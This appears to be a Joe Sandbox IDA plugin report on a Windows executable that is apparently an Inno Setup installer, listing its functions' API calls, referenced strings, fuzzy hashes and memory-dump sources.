                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                              • String ID:
                                                                              • API String ID: 1095203571-0
                                                                              • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                              • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                                              • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                              • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
                                                                              APIs
                                                                                • Part of subcall function 0045CE9C: SetLastError.KERNEL32(00000057,00000000,0045CF68,?,?,?,?,00000000), ref: 0045CF07
                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00473520,?,?,0049C1DC,00000000), ref: 004734D9
                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00473520,?,?,0049C1DC,00000000), ref: 004734EF
                                                                              Strings
                                                                              • Setting permissions on registry key: %s\%s, xrefs: 0047349E
                                                                              • Failed to set permissions on registry key (%d)., xrefs: 00473500
                                                                              • Could not set permissions on the registry key because it currently does not exist., xrefs: 004734E3
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                              • API String ID: 1452528299-4018462623
                                                                              • Opcode ID: 6a97e4f81041aadbe163303a7d14e2778330a35fec2615f3944f9ca16867819a
                                                                              • Instruction ID: f6b37ec0c80c1520313a246a851a493010c524415d82476cd93cad017a8f966b
                                                                              • Opcode Fuzzy Hash: 6a97e4f81041aadbe163303a7d14e2778330a35fec2615f3944f9ca16867819a
                                                                              • Instruction Fuzzy Hash: 76218670A042445FCB10DFA9C8826EEBBE4DF49315F50817BE508E7392D7785E05876D
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                              • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                              • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$AllocString
                                                                              • String ID:
                                                                              • API String ID: 262959230-0
                                                                              • Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                              • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                              • Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                              • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                              APIs
                                                                              • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
                                                                              • RealizePalette.GDI32(00000000), ref: 00414421
                                                                              • SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
                                                                              • RealizePalette.GDI32(00000000), ref: 0041443B
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00414446
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Palette$RealizeSelect$Release
                                                                              • String ID:
                                                                              • API String ID: 2261976640-0
                                                                              • Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                              • Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
                                                                              • Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                              • Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
                                                                              APIs
                                                                                • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
                                                                                • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
                                                                                • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
                                                                                • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
                                                                              • OffsetRect.USER32(?,?,?), ref: 00424DC9
                                                                              • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
                                                                              • OffsetRect.USER32(?,?,?), ref: 00424E9D
                                                                                • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
                                                                                • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
                                                                                • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
                                                                                • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
                                                                              • String ID: vLB
                                                                              • API String ID: 1477829881-1797516613
                                                                              • Opcode ID: 9987255b0b6c78362164308449554d51e9442941db4b17a29f095a444d8f0f61
                                                                              • Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
                                                                              • Opcode Fuzzy Hash: 9987255b0b6c78362164308449554d51e9442941db4b17a29f095a444d8f0f61
                                                                              • Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
                                                                              APIs
                                                                              • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
                                                                              • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
                                                                              • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Enum$NameOpenResourceUniversal
                                                                              • String ID: Z
                                                                              • API String ID: 3604996873-1505515367
                                                                              • Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                              • Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
                                                                              • Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                              • Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
                                                                              APIs
                                                                              • SetRectEmpty.USER32(?), ref: 0044D04E
                                                                              • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
                                                                              • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: DrawText$EmptyRect
                                                                              • String ID:
                                                                              • API String ID: 182455014-2867612384
                                                                              • Opcode ID: 3cb455d8176bf3e5231f8dda4285d64bdc155d7a8260b5a0e5f680fe50550aac
                                                                              • Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
                                                                              • Opcode Fuzzy Hash: 3cb455d8176bf3e5231f8dda4285d64bdc155d7a8260b5a0e5f680fe50550aac
                                                                              • Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 0042EF9E
                                                                                • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                              • SelectObject.GDI32(?,00000000), ref: 0042EFC1
                                                                              • ReleaseDC.USER32(00000000,?), ref: 0042F0A0
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFontIndirectObjectReleaseSelect
                                                                              • String ID: ...\
                                                                              • API String ID: 3133960002-983595016
                                                                              • Opcode ID: 65766ae35a5ff9b042dd79c87bacb89811e544568082cefb05445997e7e8f61e
                                                                              • Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
                                                                              • Opcode Fuzzy Hash: 65766ae35a5ff9b042dd79c87bacb89811e544568082cefb05445997e7e8f61e
                                                                              • Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00496991,_iu,?,00000000,004539F6), ref: 004539AB
                                                                              • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00496991,_iu,?,00000000,004539F6), ref: 004539BB
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateFileHandle
                                                                              • String ID: .tmp$_iu
                                                                              • API String ID: 3498533004-10593223
                                                                              • Opcode ID: 1bf85a80132bbff87a9a827a47fd0c4a75e2f830b03f5f12b130a42208c1e1fd
                                                                              • Instruction ID: c819285d1904897ee35e15112b57b1097950df4cd651dd5525fdc5768647a91e
                                                                              • Opcode Fuzzy Hash: 1bf85a80132bbff87a9a827a47fd0c4a75e2f830b03f5f12b130a42208c1e1fd
                                                                              • Instruction Fuzzy Hash: 6531C5B0A00249ABCB11EFA5D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,004986D0,00000000,00497E76,?,?,00000000,0049B628), ref: 00497DF0
                                                                              • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,004986D0,00000000,00497E76,?,?,00000000,0049B628), ref: 00497E19
                                                                              • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00497E32
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: File$Attributes$Move
                                                                              • String ID: isRS-%.3u.tmp
                                                                              • API String ID: 3839737484-3657609586
                                                                              • Opcode ID: c8ffd91a69648c323ebec4846a0c95b9f63ed5ce66c8394ab64ce5c1dd8b2d9f
                                                                              • Instruction ID: d3b1e0af9bc01606b4acbc4251c5ccfb03fd27bd09466a3f7c53cc9bc4e4fae9
                                                                              • Opcode Fuzzy Hash: c8ffd91a69648c323ebec4846a0c95b9f63ed5ce66c8394ab64ce5c1dd8b2d9f
                                                                              • Instruction Fuzzy Hash: F5214F71E14219AFCF11EFA9C881AAFBBB8EF44714F10457BB814B72D1D6389E018B59
                                                                              APIs
                                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                              • ExitProcess.KERNEL32 ref: 00404E0D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ExitMessageProcess
                                                                              • String ID: Error$Runtime error at 00000000
                                                                              • API String ID: 1220098344-2970929446
                                                                              • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                              • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                              • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                              • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                              APIs
                                                                                • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                              • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A9C
                                                                              • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456AC9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                              • String ID: LoadTypeLib$RegisterTypeLib
                                                                              • API String ID: 1312246647-2435364021
                                                                              • Opcode ID: c06c5e8b46d4cc008794e6ef7648282b6775267df5f2c1a0af32ed40ef5fa1a3
                                                                              • Instruction ID: f320f84dc8d434ac547319b1f88b10c46afed2bb2b034f8a1d5164c41c1038b2
                                                                              • Opcode Fuzzy Hash: c06c5e8b46d4cc008794e6ef7648282b6775267df5f2c1a0af32ed40ef5fa1a3
                                                                              • Instruction Fuzzy Hash: CE118430B00604AFDB11DFA6CD55A5AB7BDEB89705F518476FD04D3652DA389E04CA14
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456FBA
                                                                              • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00457057
                                                                              Strings
                                                                              • Failed to create DebugClientWnd, xrefs: 00457020
                                                                              • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456FE6
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                              • API String ID: 3850602802-3720027226
                                                                              • Opcode ID: 6dc4dd13ffff63052e532ec2970cf3a172fdf6ef35738a55e650b02f86b7c4d3
                                                                              • Instruction ID: 7b454b92cb1dfb233f50f2560aabdc39b6abe04e8f027f2194e5078dec578530
                                                                              • Opcode Fuzzy Hash: 6dc4dd13ffff63052e532ec2970cf3a172fdf6ef35738a55e650b02f86b7c4d3
                                                                              • Instruction Fuzzy Hash: 571127706083409BE310ABA8DC81B5FBBD89B14719F01403AFE849B3C3D7795818C7AE
                                                                              APIs
                                                                                • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                              • GetFocus.USER32 ref: 00478277
                                                                              • GetKeyState.USER32(0000007A), ref: 00478289
                                                                              • WaitMessage.USER32(?,00000000,004782B0,?,00000000,004782D7,?,?,00000001,00000000,?,?,?,0047FEE6,00000000,00480DAC), ref: 00478293
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FocusMessageStateTextWaitWindow
                                                                              • String ID: Wnd=$%x
                                                                              • API String ID: 1381870634-2927251529
                                                                              • Opcode ID: f1958697a4901136eb243dbe20eb39cbb326672f79de8de72c1a435ff1b0447b
                                                                              • Instruction ID: 17992b3effc84475d262d1a309b63da61542e22f0e105337c9737e95fd9359ad
                                                                              • Opcode Fuzzy Hash: f1958697a4901136eb243dbe20eb39cbb326672f79de8de72c1a435ff1b0447b
                                                                              • Instruction Fuzzy Hash: B811A730644644AFC701FF65DC5999E7BB8EB49304F9184FAF408E7692DB386900CA69
                                                                              APIs
                                                                              • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E48C
                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E49B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Time$File$LocalSystem
                                                                              • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                              • API String ID: 1748579591-1013271723
                                                                              • Opcode ID: 2c82eb517319c4feb0678a2222fa1caa0c7cc9d70da35f771929cd42352f02e5
                                                                              • Instruction ID: a22b2a007e2cf2d6de8f80eb00497e2bff53ee2dc74e74251f844a221e221b1c
                                                                              • Opcode Fuzzy Hash: 2c82eb517319c4feb0678a2222fa1caa0c7cc9d70da35f771929cd42352f02e5
                                                                              • Instruction Fuzzy Hash: 3711F8A440C3919ED340DF6AC44432BBAE4AB89708F44496EF9C8D6381E77AC948DB67
                                                                              APIs
                                                                              • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
                                                                                • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,00498261,00000000,004982B6,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
                                                                                • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497F15,00000000), ref: 0045349F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesDeleteErrorLastMove
                                                                              • String ID: DeleteFile$MoveFile
                                                                              • API String ID: 3024442154-139070271
                                                                              • Opcode ID: 75fc53fd0ddaa48128ef6cce4dae119495c42920ad3f5386662393d2e6d8c133
                                                                              • Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
                                                                              • Opcode Fuzzy Hash: 75fc53fd0ddaa48128ef6cce4dae119495c42920ad3f5386662393d2e6d8c133
                                                                              • Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592F1,00000000,004594A9,?,00000000,00000000,00000000), ref: 00459201
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
